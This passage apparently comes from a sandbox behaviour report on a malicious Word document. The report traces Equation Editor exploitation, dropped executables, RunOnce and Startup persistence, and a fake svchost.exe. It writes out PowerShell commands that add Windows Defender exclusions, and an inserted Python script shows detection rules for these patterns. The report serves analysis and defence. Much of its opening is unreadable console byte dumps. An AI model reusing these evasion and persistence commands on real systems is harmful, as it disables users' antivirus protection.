Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......p.......f.......................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....T.......x.......p...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....T.......x.......p...............................0...............x...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....d.......................S.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....d.......................q.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....d...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....d...............................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....d...............................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....d...............P...............................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......D.......................0.......G...............".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....d.......................m.......................0.......G.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....d...............................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....d...............P...............................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....d...............................................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....d...............................................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....d.......................g.......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....d...............................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....d...............................................0.......w.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......................1.......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d.......................d.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....d...............................................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....d...............P...............................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............t...............H.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............t...............}.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............t.......................................0......./.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............t.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............t...............'.......................0.......;...............|.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............t...............W.......................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............t.......................................0.......G.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............t.......................................0.......S.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............t.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............t...............:.......................0......._.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............t...............X.......................0......._.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............t.......................................0.......k.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............t.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............t.......................................0.......w.......................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t...............U.......................0.......................l.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t...............~.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............t.......................................0...............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............t.......................................0...............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............8.......................................0.......#.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......................................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............8.......................................0......./.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8...............2.......................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............8...............Y.......................0.......;.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.........{.....".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............8.......................................0.......G.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............8.......................................0.......S.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............E.......................0......._...............~.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............8...............`.......................0......._.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............8.......................................0.......k.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.........{.....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............8.......................................0.......w.........{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......................................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8...............?.......................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............8...............g.......................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............8.......................................0.................{.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....$...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....$.......................+.......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....$.......................W.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....$.......................}.......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....$...............................................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....$...............................................0.......;.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......?.......................0.......G...............".......................
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: Allignright_companyprofile.doc ReversingLabs: Detection: 14%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknown Process created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: Allignright_companyprofile.doc Static file information: File size 2960089 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2536.6001966ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000005.00000002.2117946573.00000000003F3000.00000004.00000020.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2772.6004244ion.pdb source: powershell.exe, 00000009.00000002.2119685464.000000000037A000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2124286114.0000000002AD0000.00000002.00000001.sdmp
Source: mad[1].exe.2.dr Static PE information: 0x84B8EC41 [Tue Jul 24 03:00:17 2040 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02863876 pushfd ; retf 0071h
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_0288117C push 71CB3989h; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_02BE0590 push edx; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_02BE0720 push esi; ret

Persistence and Installation Behavior:

Drops PE files with benign system names
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe File created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Drops executables to the windows directory (C:\Windows) and starts them
Source: unknown Executable created and started: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe File created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6
Drops PE files to the startup folder
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6Jump to behavior
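The Boot Survival entries form a compact persistence pattern: a PE dropped into the user's Startup folder, a RunOnce value with the same name (the report lists the value name, not its data), and a copy named svchost.exe written under C:\Windows\Resources\Themes by a process that EQNEDT32.EXE itself wrote to disk. The script below is an added example, not part of this report or of any Joe Sandbox tooling. It parses behaviour lines in the form used here (`Source: <process> | <action>: <target>`, or the fused form in which the process path runs straight into the action) and applies four narrow rules: an autorun registry key, a PE written to the Startup folder, a Windows system-binary name outside System32/SysWOW64, and a PE written by an Office process such as EQNEDT32.EXE. The sample lines are copied from this report, with one duplicate and one benign SetErrorMode line added to show deduplication and a non-match; the rule names, the allow-listed directories and the Office process list are my own choices.

```python
"""Triage helper for sandbox behaviour lines like the ones listed above.

Parses "Source: <process> <action>: <target>" entries (fused, as exported,
or separated by " | ") and raises persistence and masquerading findings.
Added example; not code from the original report.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed input: behaviour lines taken from the listing above, plus one
# deliberate duplicate and one benign SetErrorMode line that must not fire.
SAMPLE_LINES = [
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\CTF loader_es.exe",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe",
    r"Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | File created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe",
    r"Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe",
    r"Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6",
    r"Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Bw6d8Paf6bOV36xS4N6",
    r"Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX",
]

# The source process path ends in .exe/.dll; the optional " | " accepts both layouts.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.(?:exe|dll))\s*\|?\s*(?P<action>[^:|]+?):\s*(?P<target>.+?)\s*$",
    re.IGNORECASE,
)
AUTORUN_KEY_RE = re.compile(
    r"\\CurrentVersion\\(?:RunOnce|Run|RunServicesOnce|RunServices)\b", re.IGNORECASE
)
PE_EXTENSIONS = (".exe", ".dll", ".scr", ".com")
STARTUP_DIR_MARKER = r"\start menu\programs\startup"
# Office processes that have no business writing PE files (assumed list).
OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Windows binary names malware borrows; anywhere but these directories is suspicious (assumed list).
SYSTEM_BINARY_DIRS = {
    name: {r"c:\windows\system32", r"c:\windows\syswow64"}
    for name in ("svchost.exe", "lsass.exe", "csrss.exe", "smss.exe",
                 "services.exe", "wininit.exe", "winlogon.exe")
}


@dataclass(frozen=True)
class Finding:
    kind: str    # rule that fired
    source: str  # process that performed the action
    target: str  # file or registry value it touched


def parse_line(line):
    """Split one report line into (source, action, target); None if it is not one."""
    m = LINE_RE.match(line.strip())
    return (m["src"], m["action"].strip(), m["target"]) if m else None


def _name(path):
    return PureWindowsPath(path).name.lower()


def _dir(path):
    return str(PureWindowsPath(path).parent).lower()


def evaluate(src, action, target):
    """Apply the persistence/masquerade rules to one parsed entry."""
    found = []
    if action.lower() == "registry value created or modified" and AUTORUN_KEY_RE.search(target):
        found.append(Finding("autorun_registry_key", src, target))
    if action.lower() == "file created":
        t_name, t_dir = _name(target), _dir(target)
        is_pe = t_name.endswith(PE_EXTENSIONS)
        if is_pe and STARTUP_DIR_MARKER in t_dir:
            found.append(Finding("startup_folder_drop", src, target))
        allowed_dirs = SYSTEM_BINARY_DIRS.get(t_name)
        if allowed_dirs is not None and t_dir not in allowed_dirs:
            found.append(Finding("system_name_masquerade", src, target))
        if is_pe and _name(src) in OFFICE_PROCESSES:
            found.append(Finding("office_process_dropped_pe", src, target))
    return found


def triage(lines):
    """Parse every line, run the rules, return deduplicated findings in first-seen order."""
    seen = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            for f in evaluate(*parsed):
                seen.setdefault(f, None)
    return list(seen)


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f.kind}] {f.source} -> {f.target}")
```

Running it prints five distinct findings: two PE drops by EQNEDT32.EXE, the svchost.exe masquerade under Themes, the Startup-folder drop and the RunOnce value; the duplicated RunOnce line collapses and the WINWORD SetErrorMode line produces nothing. The rules are deliberately narrow so the same logic can be lifted into a SIEM query over Sysmon FileCreate (event ID 11) and RegistryEvent value-set (event ID 13) records.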
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (35 entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (6 entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (3 entries)
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe | Process information set: NOOPENFILEERRORBOX (32 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (199 entries)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | Process information set: NOOPENFILEERRORBOX (23 entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (4 entries)

NOOPENFILEERRORBOX and NOALIGNMENTFAULTEXCEPT are SetErrorMode flags (SEM_NOOPENFILEERRORBOX, SEM_NOALIGNMENTFAULTEXCEPT). Ordinary software, Word and PowerShell included, sets them routinely, so these entries are context rather than indicators; the counts give the number of identical entries in the original listing.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
